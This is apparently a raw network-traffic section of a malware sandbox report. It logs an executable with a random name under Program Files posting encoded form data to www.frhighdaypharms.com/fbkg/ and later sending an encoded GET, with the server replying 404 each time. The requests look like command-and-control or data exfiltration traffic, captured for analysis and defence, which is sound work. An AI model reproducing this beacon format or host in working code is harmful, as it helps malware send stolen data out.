                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                13192.168.11.2050140209.182.252.24580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:55.154026031 CET442OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.frhighdaypharms.com
                                                                                                                                                                                                Referer: http://www.frhighdaypharms.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 70 59 68 53 69 2b 6d 53 4a 31 49 7a 4d 72 6c 77 6b 69 66 75 31 4d 2b 38 44 66 36 4a 78 73 69 46 6a 6a 6f 6b 30 6a 6b 69 32 32 43 6f 4b 58 48 6f 5a 42 48 34 37 2b 4b 74 48 4f 77 4d 79 6c 39 55 55 69 41 6f 47 70 41 6d 77 61 79 55 59 70 4b 5a 31 7a 51 6f 32 49 68 49 45 41 74 43 49 79 36 33 39 38 45 36 37 36 58 66 6e 70 70 38 44 53 5a 42 44 33 46 58 6e 49 6c 37 38 47 75 55 7a 6a 4a 69 37 42 61 73 33 38 69 5a 50 45 4f 6a 72 41 37 33 44 49 72 4f 69 6c 59 6f 43 6c 39 61 5a 56 44 74 57 4a 39 67 2b 2b 47 42 4e 30 50 4a 32 46 79 78 51 7a 38 4a 63 58 36 55 59 58 6b 36 79 4e 6c 79 59 59 66 39 38 73 65 42 78 47 67 31 32 39 63 4e 6e 6f 79 45 7a 36 58 53 31 6e 58 57 67 66 68 49 6e 43 76 47 6d 4a 68 4d 68 6d 57 4f 48 48 47 38 64 56 6b 63 75 41 74 4c 51 32 6d 33 31 31 70 64 55 67 2f 2f 58 55 39 47 4f 77 6b 59 5a 4e 4d 46 77 61 6a 54 37 48 36 59 41 36 52 75 64 47 59 58 6b 77 48 77 45 77 78 59 4f 70 7a 41 31 7a 51 6c 6d 5a 49 33 54 57 78 36 75 7a 37 78 51 66 64 43 31 49 51 4b 33 66 48 30 6a 79 64 5a 78 76 33 46 69 78 59 2f 78 38 4c 4b 56 36 79 4b 7a 66 51 72 66 76 33 46 72 54 4a 75 2b 74 65 6c 73 50 54 5a 53 44 50 7a 35 41 2b 4e 61 79 35 70 6c 75 33 46 56 66 37 73 54 65 76 4f 74 6c 66 69 57 61 41 64 63 6d 73 38 2f 4c 2b 31 6d 32 7a 55 62 67 2b 34 46 4c 4e 41 56 75 69 78 75 6c 6e 32 48 4a 36 64 45 6c 4f 7a 70 51 2f 59 67 73 52 56 4b 79 2b 48 6d 52 62 31 4a 6f 45 6f 66 73 62 62 64 58 68 52 45 43 59 56 6f 46 42 50 31 48 4d 7a 72 70 59 42 2f 38 2f 33 75 48 4e 46 64 7a 57 52 58 31 30 66 62 4c 6c 33 45 34 72 65 34 43 7a 6f 4f 6d 79 4c 6f 54 4b 55 61 35 61 6e 50 32 2f 47 35 42 67 55 4a 32 73 61 34 71 55 7a 39 52 47 59 57 39 42 79 72 72 73 33 36 2b 6e 6e 46 41 46 76 64 64 54 6c 58 6a 56 46 30 57 4b 55 56 35 37 76 59 35 74 75 45 73 4f 65 77 59 37 46 67 68 32 46 53 38 57 54 52 63 47 2b 34 68 34 30 6c 58 48 42 41 38 4b 2f 47 77 72 75 57 72 31 6b 64 69 63 77 4e 43 39 33 38 7a 30 55 71 6f 76 4d 51 4b 30 79 50 36 4c 39 62 6d 66 72 65 79 6c 35 57 6b 69 6e 5a 48 6a 52 54 5a 6b 73 6c 75 51 48 43 6a 45 56 48 57 44 37 68 70 75 79 67 39 33 68 34 62 46 67 30 41 38 4b 78 7a 6d 55 33 4a 55 33 77 72 68 56 32 54 76 55 4a 4f 6f 37 66 65 55 64 30 54 2f 74 44 46 53 77 61 74 49 61 79 58 36 67 7a 52 70 72 41 71 45 5a 76 56 53 6d 45 52 71 34 54 66 6c 63 4c 57 7a 33 43 54 70 6b 73 62 47 53 56 59 43 66 2b 6a 61 6a 55 4d 41 5a 31 45 47 69 37 4c 47 4f 39 54 33 6e 33 4c 6b 70 64 48 6a 4a 41 36 30 31 2b 41 50 70 6d 39 42 44 67 5a 37 69 4c 44 6b 69 4e 53 47 36 30 39 4d 6f 73 6f 33 78 2f 6d 4e 58 31 41 6e 33 49 44 4a 4b 59 44 65 53 45 47 35 52 6e 4d 34 66 77 33 68 79 33 5a 43 6b 2b 31 4e 43 6d 65 39 52 6d 73 69 45 45 38 37 59 42 33 2f 47 38 31 32 41 7a 49 53 72 4e 4f 46 58 4b 41 50 6b 69 4e 44 34 51 34 44 4c 48 54 30 6b 6a 55 37 48 6c 63 63 42 31 36 32 30 32 39 64 4a 37 6d 36 48 54 64 78 72 49 4b 79 47 48 6a 7a 39 64 6c 6a 75 57 4f 6c 7a 34 2b 33 75 71 38 75 78 42 6e 46 50 31 4c 2b 76 76 4f 36 39 32 30 4c 69 79 61 34 37 55 57 70 37 42 4f 6c 63 49 4f 56 44 44 54 41 41 33 74 39 7a 76 38 4a 35 4e 66 4b 34 43 7a 41 62 6b 4f 4c 66 6e 63 79 66 35 7a 63 34 75 58 6f 30 7a 4c 52 44 79 52 5a 51 50 52 33 2f 59 62 53 4f 52 35 4d 53 70 75 6b 2b 6e 6f 65 33 30 71 62 31 79 36 64 49 2f 61 6b 52 2b 52 45 67 2f 68 39 4a 74 41 67 4e 52 52 77 66 75 68 54 58 75 70 41 6b 31 36 4f 6b 6d 47 6f 46 32 2b 74 49 43 38 56 77 4f 7a 30 58 73 76 47 37 39 54 54 45 68 62 59 64 52 52 6f 75 35 5a 53 70 6b 6b 35 57 76 6b 39 51 76 6e 4d 4d 66 64 35 79 34 6a 35 5a 30 7a 38 4c 6f 79 2b 66 74 6e 32 41 2b 4e 66 5a 59 4f 41 30 56 70 43 47 49 76 33 75 41 4c 79 30 52 44 44 51 48 72 2b 4e 49 33 63 67 38 65 6c 4b 6c 39 41 67 30 43 48 53 2b 6b 46 75 30 58 4f 53 32 7a 49 32 43 50 6a 54 47 45 57 7a 43 2f 42 73 43 71 55 79 4e 46 6a 79 76 7a 49 72 77 4b 51 75 4b 35 2f 74 33 71 46 6d 6d 79 39 44 69 35 36 71 37 37 53 75 50 51 50 76 74 6e 4a 37 67 5a 6b 78 2f 58 31 2f 74 6e 50 39 41 4d 48 39 5a 4d 48 30 6a 5a 73 64 72 37 50 30 4d 78 37 55 41 66 49 2f 66 69 50 5a 52 6f 75 68 59 75 4b 42 6c 42 59 4f 74 48 41 72 53 37 78 57 52 57 30 6f 46 4c 49 71 52 44 68 51 56 50 78 6a 74 38 79 58 33 65 4e 6a 37 4e 6d 43 49 78 55
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:26:55.326730967 CET445OUTData Raw: 55 53 4b 36 64 75 73 71 34 6f 66 37 4e 56 48 48 59 6e 63 68 77 50 39 79 52 72 36 36 41 56 4c 43 6a 6a 4d 53 57 59 48 70 4d 39 38 4b 52 6b 6c 2b 76 34 76 72 34 37 4f 69 6b 4d 52 52 62 57 56 64 30 4e 36 43 7a 53 79 5a 6b 2b 6a 42 6a 47 48 50 47 68
                                                                                                                                                                                                Data Ascii: USK6dusq4of7NVHHYnchwP9yRr66AVLCjjMSWYHpM98KRkl+v4vr47OikMRRbWVd0N6CzSyZk+jBjGHPGhCyypPvPsMA/MD+j7E6r6WtbzrFqc9e7kT6I7ResDx5KVEaZmT4xnIorApJJaDdHQoSRIb9+Fe+7R6RgM9MFxuA+X1pGp1DFo4+ChGMDZEIpEJfj4MBpdbt4EIfxcpktcDvhpV3UwC4dedH1GJW9NpkQDXkOdgMO/h
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327080011 CET452OUTData Raw: 64 47 2b 44 6a 64 70 7a 37 39 7a 75 62 46 53 49 5a 45 44 2b 53 4e 48 38 53 69 38 61 36 2f 73 4b 52 4f 2f 35 76 58 31 51 45 77 56 37 53 52 56 6f 45 70 6c 4b 36 79 31 36 2f 48 36 5a 6f 46 52 74 50 50 45 53 57 33 36 44 5a 51 4c 76 49 69 52 38 6a 53
                                                                                                                                                                                                Data Ascii: dG+Djdpz79zubFSIZED+SNH8Si8a6/sKRO/5vX1QEwV7SRVoEplK6y16/H6ZoFRtPPESW36DZQLvIiR8jSim6gw7uSKvoGqnOfb368DYxeWGUim3H3IjVjL415EXG0pL8izwThI7Kdl9TqoePKcKptahSX0ELAj+EbK3ThXzCh1NRPnltqbf9pMVE+qOfoYR0PtKawcubtteS9bjifdNKhVowxa0quAQNyH8gZBT1jMlAJQHMtB
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327255011 CET455OUTData Raw: 4e 71 46 57 55 54 57 34 55 52 52 58 45 4c 39 68 71 33 70 6c 42 6e 56 35 41 75 70 4a 67 37 77 30 39 70 4c 72 52 52 51 50 37 75 7a 4f 48 2b 2b 57 63 73 41 75 79 38 70 53 49 44 77 52 6d 77 43 65 58 46 4c 6f 4d 2b 59 63 55 67 6e 54 6e 51 47 42 66 45
                                                                                                                                                                                                Data Ascii: NqFWUTW4URRXEL9hq3plBnV5AupJg7w09pLrRRQP7uzOH++WcsAuy8pSIDwRmwCeXFLoM+YcUgnTnQGBfEvVcac/1Yo4TySLCJDFrjjc2hP4z7lA/n/Jgx+Q3ue2nS/MLBYux2LFlfxrILSCCQo3MGkvV4ewdsf8bXAtXXfkmsuKwDzTCOdQ22Svt9AaDl+4mFCt9nVhaAYapWx8y4mtq7QLWNfJsB+m4HqgbS6JpN5MPPJJT+S
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327588081 CET458OUTData Raw: 6d 64 30 46 72 67 47 56 5a 57 4e 74 61 61 42 79 74 30 57 74 6b 53 4f 46 55 49 46 4e 55 76 4e 30 57 72 64 43 56 5a 36 37 71 67 51 62 72 37 6c 31 32 51 61 74 73 57 4a 31 73 54 68 6c 41 4c 78 6e 4e 69 75 6a 65 6a 77 57 6b 6e 70 70 37 61 68 70 6d 39
                                                                                                                                                                                                Data Ascii: md0FrgGVZWNtaaByt0WtkSOFUIFNUvN0WrdCVZ67qgQbr7l12QatsWJ1sThlALxnNiujejwWknpp7ahpm9noVeJOHNXHJnqqKvhJDj0QWQV2iyfNBsnWKgJVVY+OlIUquKf8mViKihfgzBbu/ZA+JutsjEiZbXis6xesLm52CLqrUOn/FVXybxSopl9rJf2Np6e+eNU4hvK9pFV2+DZTs836yHKIkdTw45YFcbeMEQMqggTcKgQ
                                                                                                                                                                                                Nov 17, 2023 19:26:55.327953100 CET463OUTData Raw: 30 79 53 4d 36 6e 54 37 68 51 64 36 6e 30 30 42 79 35 30 6b 59 53 37 69 79 66 51 5a 58 70 6b 33 69 4b 49 45 71 37 74 62 70 56 59 31 44 52 56 78 6e 49 53 66 78 32 2f 51 65 7a 63 72 77 6f 68 4e 34 44 43 57 31 53 74 74 34 64 4b 6b 2b 30 79 37 43 4f
                                                                                                                                                                                                Data Ascii: 0ySM6nT7hQd6n00By50kYS7iyfQZXpk3iKIEq7tbpVY1DRVxnISfx2/QezcrwohN4DCW1Stt4dKk+0y7COJyHpWeRQISNFv7n67DMmm/2h13QJm56O0xgf+QIvhiRyKhJWUJ0GOn0NwMizIYkyXs6OfGqe9p7cthzUCZBWdqPOrV2m+vR69+c0Sf2MNzmZl1Wp3HaPOkysKc4HZhmuAYEw9qJim7P+ZzBgtbPLQcDAJ7FN/cdmh
                                                                                                                                                                                                Nov 17, 2023 19:26:55.328129053 CET468OUTData Raw: 33 61 61 31 72 59 75 4d 76 34 36 75 34 6f 67 33 6f 38 2b 32 76 49 48 32 4d 56 56 4f 6e 36 56 72 37 7a 33 74 61 33 4e 76 78 53 69 36 6e 44 37 6a 43 79 79 67 6c 49 6f 75 7a 34 30 45 42 59 41 79 51 6e 50 75 4c 31 64 66 76 2f 2f 59 32 4b 4f 73 47 65
                                                                                                                                                                                                Data Ascii: 3aa1rYuMv46u4og3o8+2vIH2MVVOn6Vr7z3ta3NvxSi6nD7jCyyglIouz40EBYAyQnPuL1dfv//Y2KOsGehwI4TYNjflmPMiYqS6NNLxonkXpDQKRZ3ijuRYus/DDKcCHHZvt+lEtpzKSMX4zyAFpKBgvVpsRRkx1Wheg6KlYI30VGsBoiXcgvU6I0bZNTJjLSMCcJBC2tZMtAmoO0/1Ajh4sYWy7mKx0ZrtAboFqcBSq+ocksq
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497678995 CET471OUTData Raw: 31 2f 75 50 75 51 49 68 7a 34 66 56 55 4f 49 34 56 35 38 56 30 7a 33 4c 44 54 67 55 77 38 6c 38 5a 32 76 45 68 6a 4d 41 37 64 6d 72 51 63 47 72 63 54 71 6d 75 31 66 59 72 4c 55 66 79 38 6c 58 48 47 47 52 4f 6e 4e 6d 68 4f 55 51 4b 32 65 30 42 7a
                                                                                                                                                                                                Data Ascii: 1/uPuQIhz4fVUOI4V58V0z3LDTgUw8l8Z2vEhjMA7dmrQcGrcTqmu1fYrLUfy8lXHGGROnNmhOUQK2e0BzUrBnsSyEZPDoj43Jdf26xwb6aE8+Q6V8z5EXR0cVe4CKQQoKRUl9F1m9kjB4ixxJfStrPYXCUsPy/1sHI402ZuoIMV4gnZ0puPoBJROv23o90Vjo3TWQkkSc1/FfkwXsXNnYOORIH1EREGoiPP+BQVcYziLtTcfbe
                                                                                                                                                                                                Nov 17, 2023 19:26:55.497792006 CET473OUTData Raw: 31 72 4b 30 64 6f 39 53 6e 73 70 4f 6c 74 4a 41 56 55 39 4b 76 35 69 6a 45 46 35 58 72 39 4f 54 6d 47 36 78 78 41 51 71 38 71 31 6e 68 65 69 70 52 45 42 68 6b 37 31 44 66 62 79 39 6f 6b 4c 56 73 4b 46 77 47 69 37 75 43 59 43 2f 4e 6f 4e 6a 43 59
                                                                                                                                                                                                Data Ascii: 1rK0do9SnspOltJAVU9Kv5ijEF5Xr9OTmG6xxAQq8q1nheipREBhk71Dfby9okLVsKFwGi7uCYC/NoNjCYPg43C9W6UkPKB/boRnRo1r2apavcKxAv3jciad6QO0QIJU9jbfirYeilINVDd15VnRI/1euYCLH3aiVS5EldblMs2CuckouY1gVCTlZpMX95j+6xm8t8/WNGo0aGxhl7+jl/JZBhm60KtzOtUOuK/ig94u9L3Htil
                                                                                                                                                                                                Nov 17, 2023 19:26:55.498017073 CET483OUTData Raw: 34 7a 49 46 6f 7a 36 69 69 48 59 6c 30 78 37 78 66 74 58 74 4e 4f 50 4b 47 39 44 5a 30 38 56 38 74 6d 54 57 79 77 70 6e 34 6b 66 76 4d 34 35 36 78 47 37 53 59 7a 31 4c 4e 71 50 4b 34 79 4b 66 45 64 41 58 30 74 66 64 78 70 33 39 35 32 39 72 41 53
                                                                                                                                                                                                Data Ascii: 4zIFoz6iiHYl0x7xftXtNOPKG9DZ08V8tmTWywpn4kfvM456xG7SYz1LNqPK4yKfEdAX0tfdxp39529rASlGRiwpli+pAzos6kt0XuXUyRfcaadS6OY9RoMqjqlMN93wQOKWovt+5IZs3yBxu1X64gutxJ99vT7luNZVV+54klZ2+QhRqfEPvkaqSIDThvPd1k13lHWLYKBldtZZnrJCOU86t/O/zyhFtV3yCN9KTiDvR5wQy0w
                                                                                                                                                                                                Nov 17, 2023 19:26:55.981093884 CET485OUTData Raw: 4c 4c 7a 55 34 4c 74 49 47 4a 52 4a 37 67 59 58 2b 7a 63 6a 70 61 51 4f 69 59 53 35 64 57 7a 4c 44 77 74 43 6d 41 71 36 33 44 47 73 2b 46 7a 66 74 5a 41 69 6c 79 78 4d 6a 46 46 51 2b 5a 32 73 62 4e 55 72 7a 6b 69 49 49 6c 49 41 6e 55 43 74 6d 4e
                                                                                                                                                                                                Data Ascii: LLzU4LtIGJRJ7gYX+zcjpaQOiYS5dWzLDwtCmAq63DGs+FzftZAilyxMjFFQ+Z2sbNUrzkiIIlIAnUCtmN0AFkit9D5LnzYX2zqE+bIFTJUsJI1ZsPIES8+X2WJ1qvt1p/nEaBrKgOlmneA1Tk24J42sk7E0CwEnCoISkdJSg1tNawc6UTk/TpufHp9YfN0S2u+7OuxiMTUsDq2zqjzP2eySThlNkki98dn2gh7UuhM71EnbWTI
                                                                                                                                                                                                Nov 17, 2023 19:26:56.322904110 CET489INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:26:55 GMT
                                                                                                                                                                                                Server: Apache/2.4.57 (codeit) OpenSSL/3.0.10+quic mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                14209.182.252.24580192.168.11.2050141C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:26:57.855470896 CET489OUTGET /fbkg/?Nx1L1=526dgl_phJ&T6I=kaJyhKmkPlgtKJtmmBfH2viQGZqK+66G0n0GrQsx6FyEW0DjSTzd6+/fE4wxwFlAMzIoBYsI873pRJak10YM5J9PGBdAXgKtow== HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.frhighdaypharms.com
                                                                                                                                                                                                Connection: close
